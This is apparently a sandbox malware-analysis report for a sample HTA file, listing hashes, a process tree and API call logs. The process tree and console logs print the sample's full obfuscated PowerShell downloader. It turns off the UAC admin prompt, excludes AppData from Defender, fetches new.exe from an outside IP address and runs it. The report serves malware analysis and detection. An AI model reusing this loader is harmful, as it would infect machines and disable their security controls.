popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

sample.hta

Generic Malware Antivirus AntiVM AntiDebug PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 21, 2024, 2:27 p.m. Oct. 21, 2024, 2:48 p.m.
Size 11.6KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 626bcb3968271f435d45e03c6b730644
SHA256 07a15009109cb6c6669079ed6ebb74b4f5ef3346aa18d85562786742b9344550
CRC32 5EE4A471
ssdeep 192:nkhhDGyAjyZv9t9GUcex0PzHQz2RlG777mz//CKExs:nkhhKyAOZvf9Fcex0PzHQzSlG777mT6W
Yara None matched

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\sample.hta

    1188

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function wPteUlwSl($qhjsuSd, $vgEFwpxboUPauFSM){[IO.File]::WriteAllBytes($qhjsuSd, $vgEFwpxboUPauFSM)};function ZnrSgmqbPVfjB($qhjsuSd){if($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33641,33649,33649))) -eq $True){rundll32.exe $qhjsuSd }elseif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33653,33656,33590))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $qhjsuSd}elseif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33650,33656,33646))) -eq $True){misexec /qn /i $qhjsuSd}else{Start-Process $qhjsuSd}};function RRqzVWXfYUJFDAwJpdp($bJOaLKsoekvRrDkAPwq){$FtxzLgTFTlTLhRsI = New-Object (dKWlQUWuijH @(33619,33642,33657,33587,33628,33642,33639,33608,33649,33646,33642,33651,33657));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vgEFwpxboUPauFSM = $FtxzLgTFTlTLhRsI.DownloadData($bJOaLKsoekvRrDkAPwq);return $vgEFwpxboUPauFSM};function dKWlQUWuijH($xDrfpdisvcDSC){$SzhMyYwdKDtrEZC=33541;$LZOAyvnxYRB=$Null;foreach($bKFEidACAllzisv in $xDrfpdisvcDSC){$LZOAyvnxYRB+=[char]($bKFEidACAllzisv-$SzhMyYwdKDtrEZC)};return $LZOAyvnxYRB};function enAxnkDfhW(){$OCTHfCJvxwmY = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$xsXesBDGtNXaQjqb=$env:AppData; Add-MpPreference -ExclusionPath $xsXesBDGtNXaQjqb;$obJQIBqPB = $OCTHfCJvxwmY + 'new.exe'; if (Test-Path -Path $obJQIBqPB){ZnrSgmqbPVfjB $obJQIBqPB;}Else{ $bPZFpQO = RRqzVWXfYUJFDAwJpdp (dKWlQUWuijH @(33645,33657,33657,33653,33599,33588,33588,33591,33590,33589,33587,33594,33595,33587,33590,33592,33587,33590,33590,33593,33588,33651,33642,33660,33587,33642,33661,33642));wPteUlwSl $obJQIBqPB $bPZFpQO;ZnrSgmqbPVfjB $obJQIBqPB;};;;;}enAxnkDfhW;" uac

      2060

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
210.56.13.114 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: , script file, or operable program. Check the spelling of the name, or if a pat
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: h was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:1 char:1318
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + function wPteUlwSl($qhjsuSd, $vgEFwpxboUPauFSM){[IO.File]::WriteAllBytes($qhj
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: suSd, $vgEFwpxboUPauFSM)};function ZnrSgmqbPVfjB($qhjsuSd){if($qhjsuSd.EndsWith
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: ((dKWlQUWuijH @(33587,33641,33649,33649))) -eq $True){rundll32.exe $qhjsuSd }el
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: seif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33653,33656,33590))) -eq $True){pow
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: ershell.exe -ExecutionPolicy unrestricted -File $qhjsuSd}elseif($qhjsuSd.EndsWi
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: th((dKWlQUWuijH @(33587,33650,33656,33646))) -eq $True){misexec /qn /i $qhjsuSd
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: }else{Start-Process $qhjsuSd}};function RRqzVWXfYUJFDAwJpdp($bJOaLKsoekvRrDkAPw
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: q){$FtxzLgTFTlTLhRsI = New-Object (dKWlQUWuijH @(33619,33642,33657,33587,33628,
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: 33642,33639,33608,33649,33646,33642,33651,33657));[Net.ServicePointManager]::Se
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: curityProtocol = [Net.SecurityProtocolType]::TLS12;$vgEFwpxboUPauFSM = $FtxzLgT
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: FTlTLhRsI.DownloadData($bJOaLKsoekvRrDkAPwq);return $vgEFwpxboUPauFSM};function
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: dKWlQUWuijH($xDrfpdisvcDSC){$SzhMyYwdKDtrEZC=33541;$LZOAyvnxYRB=$Null;foreach(
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: $bKFEidACAllzisv in $xDrfpdisvcDSC){$LZOAyvnxYRB+=[char]($bKFEidACAllzisv-$SzhM
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: yYwdKDtrEZC)};return $LZOAyvnxYRB};function enAxnkDfhW(){$OCTHfCJvxwmY = $env:A
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: ppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Micro
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: soft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -V
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: alue 0;$xsXesBDGtNXaQjqb=$env:AppData; Add-MpPreference <<<< -ExclusionPath $x
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: sXesBDGtNXaQjqb;$obJQIBqPB = $OCTHfCJvxwmY + 'new.exe'; if (Test-Path -Path $ob
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: JQIBqPB){ZnrSgmqbPVfjB $obJQIBqPB;}Else{ $bPZFpQO = RRqzVWXfYUJFDAwJpdp (dKWlQU
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: WuijH @(33645,33657,33657,33653,33599,33588,33588,33591,33590,33589,33587,33594
console_handle: 0x00000137
1 1 0

WriteConsoleW

 buffer: 33642,33661,33642));wPteUlwSl $obJQIBqPB $bPZFpQO;ZnrSgmqbPVfjB $obJQIBqPB;};;;
console_handle: 0x0000014f
1 1 0

WriteConsoleW

 buffer: ;}enAxnkDfhW; uac
console_handle: 0x0000015b
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co
console_handle: 0x00000167
1 1 0

WriteConsoleW

 buffer: mmandNotFoundException
console_handle: 0x00000173
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x0000017f
1 1 0

WriteConsoleW

 buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x0000019f
1 1 0

WriteConsoleW

 buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x000001ab
1 1 0

WriteConsoleW

 buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x000001b7
1 1 0

WriteConsoleW

 buffer: sl3, Tls"."
console_handle: 0x000001c3
1 1 0

WriteConsoleW

 buffer: At line:1 char:708
console_handle: 0x000001cf
1 1 0

WriteConsoleW

 buffer: + function wPteUlwSl($qhjsuSd, $vgEFwpxboUPauFSM){[IO.File]::WriteAllBytes($qhj
console_handle: 0x000001db
1 1 0

WriteConsoleW

 buffer: suSd, $vgEFwpxboUPauFSM)};function ZnrSgmqbPVfjB($qhjsuSd){if($qhjsuSd.EndsWith
console_handle: 0x000001e7
1 1 0

WriteConsoleW

 buffer: ((dKWlQUWuijH @(33587,33641,33649,33649))) -eq $True){rundll32.exe $qhjsuSd }el
console_handle: 0x000001f3
1 1 0

WriteConsoleW

 buffer: seif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33653,33656,33590))) -eq $True){pow
console_handle: 0x000001ff
1 1 0

WriteConsoleW

 buffer: ershell.exe -ExecutionPolicy unrestricted -File $qhjsuSd}elseif($qhjsuSd.EndsWi
console_handle: 0x0000020b
1 1 0

WriteConsoleW

 buffer: th((dKWlQUWuijH @(33587,33650,33656,33646))) -eq $True){misexec /qn /i $qhjsuSd
console_handle: 0x00000217
1 1 0

WriteConsoleW

 buffer: }else{Start-Process $qhjsuSd}};function RRqzVWXfYUJFDAwJpdp($bJOaLKsoekvRrDkAPw
console_handle: 0x00000223
1 1 0

WriteConsoleW

 buffer: q){$FtxzLgTFTlTLhRsI = New-Object (dKWlQUWuijH @(33619,33642,33657,33587,33628,
console_handle: 0x0000022f
1 1 0

WriteConsoleW

 buffer: 33642,33639,33608,33649,33646,33642,33651,33657));[Net.ServicePointManager]:: <
console_handle: 0x0000023b
1 1 0

WriteConsoleW

 buffer: <<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vgEFwpxboUPauFSM = $F
console_handle: 0x00000247
1 1 0

WriteConsoleW

 buffer: txzLgTFTlTLhRsI.DownloadData($bJOaLKsoekvRrDkAPwq);return $vgEFwpxboUPauFSM};fu
console_handle: 0x00000253
1 1 0

WriteConsoleW

 buffer: nction dKWlQUWuijH($xDrfpdisvcDSC){$SzhMyYwdKDtrEZC=33541;$LZOAyvnxYRB=$Null;fo
console_handle: 0x0000025f
1 1 0

WriteConsoleW

 buffer: reach($bKFEidACAllzisv in $xDrfpdisvcDSC){$LZOAyvnxYRB+=[char]($bKFEidACAllzisv
console_handle: 0x0000026b
1 1 0

WriteConsoleW

 buffer: -$SzhMyYwdKDtrEZC)};return $LZOAyvnxYRB};function enAxnkDfhW(){$OCTHfCJvxwmY =
console_handle: 0x00000277
1 1 0

WriteConsoleW

 buffer: $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software
console_handle: 0x00000283
1 1 0

WriteConsoleW

 buffer: \Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAd
console_handle: 0x0000028f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029ee18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029ee98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029ee98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029ee98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f718
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f718
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f718
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f718
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f718
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f718
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029ee98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029ee98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029ee98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029efd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029efd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029efd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f7d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029efd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029efd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029efd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029efd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029efd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029efd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029efd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f058
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0029f398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 1245184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02800000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2060
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2060
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0252b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02527000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02512000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02525000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04930000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0252c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02513000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02514000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02515000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02516000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02517000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02518000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02519000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04a25000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2060
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
